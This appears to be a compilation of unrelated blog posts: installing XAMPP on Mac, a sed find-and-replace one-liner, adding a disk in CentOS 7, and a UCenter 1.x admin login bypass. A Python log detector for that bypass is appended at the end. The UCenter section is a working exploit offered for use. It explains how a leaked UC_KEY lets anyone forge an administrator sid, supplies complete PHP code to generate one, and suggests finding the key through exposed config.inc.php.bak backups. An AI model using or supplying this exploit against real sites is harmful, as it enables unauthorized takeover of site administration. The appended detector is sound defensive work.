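Installing XAMPP on Mac

What is XAMPP?
From the official introduction: XAMPP for Mac OS X is the simplest, most practical and most complete web server solution for Mac OS X. The distribution includes an Apache 2 server integrated with the latest MySQL, PHP and Perl. It is released as a Mac OS X installer package containing all required files, with nothing else to download.

If you are an experienced web developer, or a Mac enthusiast who needs to run a server, create dynamic web pages or use a database, this is what you are looking for!

This version requires Mac OS X 10.4 (Intel & PPC) or later.
Download and install
1. Download the file: XAMPP Mac OS X 1.7.3, then double-click it to install.
2. After the installation completes, use the commands below to start XAMPP. In a terminal, log in as the system administrator root: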

sudo su

Start XAMPP with the following command:

/Applications/XAMPP/xamppfiles/xampp start

If you see messages like the following on screen:
Starting XAMPP for MacOS X 1.7.3…
XAMPP: Starting Apache with SSL (and PHP5)…
XAMPP: Starting MySQL…
XAMPP: Starting ProFTPD…
XAMPP for MacOS X started.
then congratulations, the installation succeeded!
3. If you get the following error at the XAMPP: Starting ProFTPD… step:
XAMPP: Starting ProFTPD…/Applications/XAMPP/xamppfiles/xampp: line 184: /Applications/XAMPP/xamppfiles//var/proftpd/start.err: No such file or directory
fail.
Contents of “/Applications/XAMPP/xamppfiles//var/proftpd/start.err”:
cat: /Applications/XAMPP/xamppfiles//var/proftpd/start.err: No such file or directory

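just run the following commands:

sudo mkdir -p /Applications/XAMPP/xamppfiles/var/proftpd/
sudo touch /Applications/XAMPP/xamppfiles/var/proftpd/start.err
sudo /Applications/XAMPP/xamppfiles/xampp fix_rights

Then repeat the operations in step 2.
4. After a successful installation, enter http://localhost in your browser and you will see the following page!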

How to use sed to find and replace text in files in Linux / Unix shell


This is self-explanatory!

find . -type f -exec sed -i 's/oldstr/newstr/g' {} +

We used this to replace ‘/wp-content/uploads’ with ‘/files’ while merging single WordPress sites into a big multisite setup.

find . -type f -exec sed -i 's/\/wp-content\/uploads/\/files/g' {} +

Adding a hard drive in CentOS 7

Whether installing a new physical hard drive to a server or adding an additional disk to your cloud server or VPS, you’ll need to configure CentOS to be able to use it.

We’re going to assume the drive is connected, so first of all we need to find it.

To do that, we need to know the naming convention your server is using for drives, and we can find this with the ‘df’ command.

[user@server ~] df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/vda2 24733776 2521604 20942668 11% /
/dev/vda1 1007512 203260 751824 22% /boot

The two lines above show that this particular server is using the vd* notation, but sd* is also used. Here the primary drive, vda, has two partitions – vda1 and vda2.

We can now use the following command to find other disks:

[user@server ~] ls -1 /dev/[sv]d[a-z]
/dev/vda
/dev/vdb

We can see both our original disk, vda, and the new disk, vdb. Now we create a filesystem on the new disk with the ‘mkfs.ext4’ utility.

[user@server ~] sudo mkfs.ext4 /dev/vdb

This will just take a few seconds.

To use the new disk we now need to mount it. When you’ve decided where you want to mount the disk, first create that folder on your server. We’re going to use ‘home2’ for our disk.

[user@server ~] sudo mkdir /home2

We can now mount the disk to that location:

[user@server ~] sudo mount /dev/vdb /home2

Revisiting the df command we can now see that the new disk is mounted.

[user@server ~] df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/vda2 24733776 2521604 20942668 11% /
/dev/vda1 1007512 203260 751824 22% /boot
/dev/vdb 25000000 100 24999900 1% /home2

To ensure the disk is automatically mounted when the server is rebooted, we also need to add it to fstab. Our preferred editor is ‘nano’, so we type:

[user@server ~] sudo nano /etc/fstab

We add, to the end of the file, the line:

/dev/vdb /home2 ext4 defaults 0 0

Then CTRL + O to save and CTRL + X to exit.

The disk will now stay mounted after reboot and you can begin using it.

ucenter 1.x adminlogin bypass (uckey->sid)

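Often, after obtaining a UCenter uckey by some means, people don't know how to make use of it (the UCenter configuration file is at /data/config.inc.php), because UCenter's uckey, unlike in Comsenz's other products, cannot be used to insert a one-line webshell by updating the configuration file. So here is how to get straight into the admin backend once you have UCenter's uckey!
First, assume a scenario: you scanned and found its bak file, config.inc.php.bak, and can see that the UCenter configuration file has the following format: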

define('UC_DBHOST', 'localhost');
define('UC_DBUSER', '****');
define('UC_DBPW', '********');
define('UC_DBNAME', 'ultrax');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', 'pre_ucenter_');
define('UC_COOKIEPATH', '/');
define('UC_COOKIEDOMAIN', '');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_FOUNDERPW', '9eeb9e61111254e3f94988e49ec186a9');
define('UC_FOUNDERSALT', 'N1Pede');
define('UC_KEY', '683T0n5a624o9e7hdr9y9Me27A6z3NecdUel728q2l7b58dD3a3I4oa07xeN3e3a');
define('UC_SITEID', 'U1seBeQ7t280z7F1m8j0g0S1vfu3k7W2t1Mf3dyaE7i0Je78Gct707SbG0J7VdH6');
define('UC_MYKEY', 'l1pejeQ7m2Q0Y781G80080C10fW3d722c1bfJduai7j0yeM8Dct7N7kbf0e7Bdb6');
define('UC_DEBUG', false);
define('UC_PPP', 20);

This line is the uckey:

define('UC_KEY', '683T0n5a624o9e7hdr9y9Me27A6z3NecdUel728q2l7b58dD3a3I4oa07xeN3e3a');

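UCenter's own uckey seems to play no substantial role anywhere in the program, but obviously that cannot be the case.
UCenter's own uckey is actually used in the UCenter admin login process: from this uckey you can directly compute a login string, and thereby log in to the UCenter admin backend without an account or password. First, let's look at UCenter's admin verification code: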

// ucenter_dir/model/admin.php

function check_priv() {
    // The username comes solely from decoding the sid; no password is checked here.
    $username = $this->sid_decode($this->view->sid);
    if(empty($username)) {
        header('Location: '.UC_API.'/admin.php?m=user&a=login&iframe='.getgpc('iframe', 'G').($this->cookie_status ? '' : '&sid='.$this->view->sid));
        exit;
    } else {
        $this->user['isfounder'] = $username == 'UCenterAdministrator' ? 1 : 0;
        if(!$this->user['isfounder']) {
            $admin = $this->db->fetch_first("SELECT a.*, m.* FROM ".UC_DBTABLEPRE."admins a LEFT JOIN ".UC_DBTABLEPRE."members m USING(uid) WHERE a.username='$username'");
            if(empty($admin)) {
                header('Location: '.UC_API.'/admin.php?m=user&a=login&iframe='.getgpc('iframe', 'G').($this->cookie_status ? '' : '&sid='.$this->view->sid));
                exit;
            } else {
                $this->user = $admin;
                $this->user['username'] = $username;
                $this->user['admin'] = 1;
                $this->view->sid = $this->sid_encode($username);
                $this->setcookie('sid', $this->view->sid, 86400);
            }
        } else {
            // A sid that decodes to 'UCenterAdministrator' is treated as the founder with no database lookup.
            $this->user['username'] = 'UCenterAdministrator';
            $this->user['admin'] = 1;
            $this->view->sid = $this->sid_encode($this->user['username']);
            $this->setcookie('sid', $this->view->sid, 86400);
        }
        $this->view->assign('user', $this->user);
    }
}

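UCenter's verification function check_priv checks whether you are currently logged in, and the basis of its verification is not the account and password. Look at the first statement: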

$username = $this->sid_decode($this->view->sid);

The sid value passed in is parsed by the sid_decode function, which looks like this:

// ucenter_dir/model/admin.php
function sid_decode($sid) {
    $ip = $this->onlineip;
    $agent = $_SERVER['HTTP_USER_AGENT'];
    // The decryption key is derived from the client IP, the client User-Agent and the static UC_KEY.
    $authkey = md5($ip.$agent.UC_KEY);
    $s = $this->authcode(rawurldecode($sid), 'DECODE', $authkey, 1800);
    if(empty($s)) {
        return FALSE;
    }
    @list($username, $check) = explode("\t", $s);
    // The check value depends only on the IP and User-Agent.
    if($check == substr(md5($ip.$agent), 0, 8)) {
        return $username;
    } else {
        return FALSE;
    }
}

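As you can see, the basis of UCenter's verification here is not the account and password; instead it encrypts with the uckey plus information such as your UA and IP. The UA and the IP can both be forged, i.e. they are controllable, so once you have the uckey you only need to compute the correct sid with the algorithm to log in directly!
Enough talk, here is the exp: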

<?php
$uckey = '683T0n5a624o9e7hdr9y9Me27A6z3NecdUel728q2l7b58dD3a3I4oa07xeN3e3a';
// Replace this with the uckey you obtained
$username = 'UCenterAdministrator';
$agent = $_SERVER['HTTP_USER_AGENT'];
$cip = getenv('HTTP_CLIENT_IP');
$xip = getenv('HTTP_X_FORWARDED_FOR');
$rip = getenv('REMOTE_ADDR');
$srip = $_SERVER['REMOTE_ADDR'];
if($cip && strcasecmp($cip, 'unknown')) {
$ip = $cip;
} elseif($xip && strcasecmp($xip, 'unknown')) {
$ip = $xip;
} elseif($rip && strcasecmp($rip, 'unknown')) {
$ip = $rip;
} elseif($srip && strcasecmp($srip, 'unknown')) {
$ip = $srip;
}
$ip = '213.1.1.1'; // Replace this IP with your current IP; you can look it up via ip138
$authkey = md5($ip.$agent.$uckey);
$check = substr(md5($ip.$agent), 0, 8);
echo rawurlencode(_authcode("$username\t$check", 'ENCODE', $authkey, 1800));
/*
* Comsenz encryption/decryption function
*/
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++){
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++){
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++){
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result.= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE'){
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)){
return substr($result, 26);
}else{
return '';
}
}else{
return $keyc.str_replace('=', '', base64_encode($result));
}
}
?>

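Save it as any PHP file and access it through a web page to get the sid value back. Then put the resulting sid value into admin.php?sid=xxxxxxxxx to enter the admin backend directly. Let me demonstrate locally.

Then run it.

This string is the resulting sid value; visiting admin.php?sid=321cGMQBc6iB9kC24jBzFeLGwMrJURbVQjJk6qmnO3iAxNHOqwfLoX54Bh8Qrj0SFl4dGeiFQHT6Fg takes you straight into the admin backend~~~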
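
A defensive companion to the write-up above, as an added example that is not part of the original post: a Python log check that flags served copies of config.inc.php backups and admin.php requests carrying a sid from a client that never submitted the login form. The log lines, the /uc_server/ path and the assumption that the login form is POSTed to admin.php?m=user&a=login are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined format); paths and clients are illustrative.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /uc_server/data/config.inc.php.bak HTTP/1.1" 200 912 "-" "curl/8.0"
203.0.113.5 - - [10/Mar/2024:10:01:00 +0000] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:10:01:02 +0000] "GET /uc_server/admin.php?sid=aaaa HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:10:05:00 +0000] "GET /uc_server/admin.php?sid=bbbb HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2024:10:06:00 +0000] "GET /uc_server/data/config.inc.php.bak HTTP/1.1" 404 162 "-" "scanner"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# config.inc.php followed by an extra suffix (.bak, .old, ~ ...) is served as plain text.
BACKUP = re.compile(r'/config\.inc\.php(\.\w+|~)$', re.I)

def scan(log_text):
    """Return (rule, client_ip, path) findings in log order."""
    findings = []
    logged_in = set()  # client IPs that have submitted the login form (assumed POST)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query)
        # Rule 1: a backup copy of the config (which holds UC_KEY) was actually served.
        if BACKUP.search(url.path) and status == "200":
            findings.append(("config-backup-served", ip, url.path))
        if not url.path.endswith("/admin.php"):
            continue
        if method == "POST" and query.get("m") == ["user"] and query.get("a") == ["login"]:
            logged_in.add(ip)
        # Rule 2: a sid was accepted from a client with no earlier login submission.
        elif "sid" in query and status == "200" and ip not in logged_in:
            findings.append(("sid-without-login", ip, url.path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A hit on the first rule means UC_KEY and the database credentials in that file should be treated as exposed and rotated. The second rule is a heuristic, since check_priv itself appends the sid to the URL when cookies are unavailable.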